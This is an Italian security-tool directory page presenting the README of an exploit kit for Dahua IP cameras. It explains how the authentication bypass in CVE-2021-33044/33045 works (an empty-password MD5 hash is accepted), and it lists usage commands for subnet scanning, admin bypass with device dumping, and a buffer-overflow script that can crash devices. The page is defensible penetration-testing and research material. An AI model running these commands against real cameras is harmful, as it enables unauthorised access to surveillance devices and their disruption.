Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
dahua-cve-research — Kit di ricerca sulle vulnerabilità CVE per telecamere IP Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701) | Kitploit
Strumenti/GitHubGitHub/umair-aziz025/dahua-cve-research
Sicurezza IoTMappatura della ReteAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
umair-aziz025/dahua-cve-research

dahua-cve-research

Kit di ricerca sulle vulnerabilità CVE per telecamere IP Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701)

Vedi Repository
21625 mesi faRevisionato da Kitploit

Strumenti di Exploit per Telecamere IP Dahua CVE

⚠️ IN SVILUPPO — Questi script si basano sui dettagli CVE pubblicati e richiedono ulteriori test su dispositivi vulnerabili per confermare la piena funzionalità.

Script di ricerca e proof-of-concept per quattro vulnerabilità critiche delle telecamere IP Dahua.


⚠️ AVVISO LEGALE

root@kitploit:~
QUESTO SOFTWARE È FORNITO ESCLUSIVAMENTE PER SCOPI DIDATTICI E DI TEST DI SICUREZZA AUTORIZZATI.

Utilizzando questi strumenti, accetti che:
  1. Hai l'AUTORIZZAZIONE SCRITTA ESPLICITA per testare i sistemi target
  2. NON utilizzerai questi strumenti per attività illegali
  3. Accetti la piena responsabilità per le tue azioni
  4. Gli autori NON sono responsabili per eventuali abusi o danni

L'accesso non autorizzato ai sistemi informatici è un REATO PENALE nella maggior parte delle giurisdizioni.

CVE Coperte

CVECVSSTipoStato
CVE-2021-330449.8 CRITICALBypass AutenticazioneCISA KEV (attivamente sfruttato)
CVE-2021-330459.8 CRITICALBypass AutenticazioneCISA KEV (attivamente sfruttato)
CVE-2025-317008.1 HIGHBuffer Overflow DoSRec (2025)
CVE-2025-317018.1 HIGHBuffer Overflow DoSRec (2025)

CVE-2021-33044 e CVE-2021-33045 — Bypass dell'Autenticazione

  • CVSS: 9.8 CRITICAL
  • CWE: CWE-287 (Autenticazione Impropria)
  • Meccanismo: Il login RPC2 accetta hash di password vuota, concedendo accesso admin
  • Interessati: IPC-HUM7xxx, IPC-HX3xxx/HX5xxx, TPC-, VTO-, VTH-, NVR-, XVR-*
  • Risolto in: Firmware 2.820.x+ (IPC) / 4.001.x+ (NVR/XVR)
  • Riferimenti:
    • NVD CVE-2021-33044
    • NVD CVE-2021-33045
    • CISA KEV Catalog

CVE-2025-31700 e CVE-2025-31701 — Buffer Overflow (DoS/RCE)

  • CVSS: 8.1 HIGH
  • CWE: CWE-120 (Copia buffer senza controllo della dimensione dell'input)
  • Meccanismo: Pacchetti sovradimensionati causano buffer overflow → crash o potenziale RCE
  • Riferimenti:
    • NVD CVE-2025-31700
    • Dahua Security Advisory

Come Funziona il Bypass dell'Autenticazione

Le telecamere Dahua utilizzano l'autenticazione challenge-response su /RPC2_Login:

root@kitploit:~
Normal Login:
  step1 = MD5("admin:realm:PASSWORD")
  step2 = MD5("step1:random:step1")

Bypass (CVE-2021-33044/45):
  step1 = MD5("admin:realm:")      ← EMPTY password
  step2 = MD5("step1:random:step1")

Il firmware vulnerabile accetta l'hash di password vuota e restituisce un token di sessione valido.


Script


Installazione

root@kitploit:~
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit

# Install dependencies
pip install requests

Utilizzo

Scanner di Rete

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081

# Single host with port
python dahua_scanner.py 192.168.1.100:8081

# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json

# Show help
python dahua_scanner.py --help

Porte Dahua comuni: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777

Exploit Multi-CVE (Consigliato)

root@kitploit:~
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044  # Single CVE
python dahua_exploit.py --help

Bypass Autenticazione

root@kitploit:~
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump  # Dump device info after bypass

Buffer Overflow DoS

root@kitploit:~
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http  # HTTP only
python dahua_rce.py 192.168.1.100 --cve tcp   # TCP/37777 only

⚠️ AVVISO: Lo script DoS potrebbe causare il crash del dispositivo target.


Dipendenze

root@kitploit:~
requests

Tutti gli altri import provengono dalla libreria standard Python: socket, struct, hashlib, threading, ipaddress, argparse, json


Stato dello Sviluppo

🚧 IN SVILUPPO ATTIVO

Questi script sono stati sviluppati basandosi su:

  • Dettagli CVE pubblicati da NVD
  • Avvisi di sicurezza Dahua
  • Riferimenti PoC pubblici (seclists.org, packetstormsecurity)

Stato dei Test:

  • ✅ Logica di bypass autenticazione implementata secondo specifiche CVE
  • ✅ Payload buffer overflow costruiti secondo advisories
  • ⚠️ Test limitati su dispositivi vulnerabili reali
  • ⚠️ Necessaria ulteriore validazione su diverse versioni firmware

Se hai accesso a dispositivi vulnerabili per test, contributi e feedback sono benvenuti.


Contribuire

  1. Fai il fork del repository
  2. Crea un branch per la funzionalità
  3. Testa le tue modifiche
  4. Invia una pull request

Segnala eventuali problemi o falsi positivi.


Riferimenti

  • NVD - CVE-2021-33044
  • NVD - CVE-2021-33045
  • NVD - CVE-2025-31700
  • NVD - CVE-2025-31701
  • CISA Known Exploited Vulnerabilities
  • Dahua Security Center
  • Bashis PoC - Seclists

Licenza

Licenza MIT - Vedi il file LICENSE.


Autore

Umair Aziz
GitHub: @umair-aziz025


Solo per scopi didattici e di ricerca sulla sicurezza autorizzata.

Scarica lo strumento
FileScopoCVE
dahua_scanner.pyScoperta di rete — trova telecamere Dahua sulla sottoreteRilevamento
dahua_exploit.pyScanner multi-CVE — testa tutte le vulnerabilitàTutte
dahua_auth_bypass.pyBypass autenticazione dedicato con opzione --dumpCVE-2021-33044/45
dahua_rce.pyProbe buffer overflow DoSCVE-2025-31700/01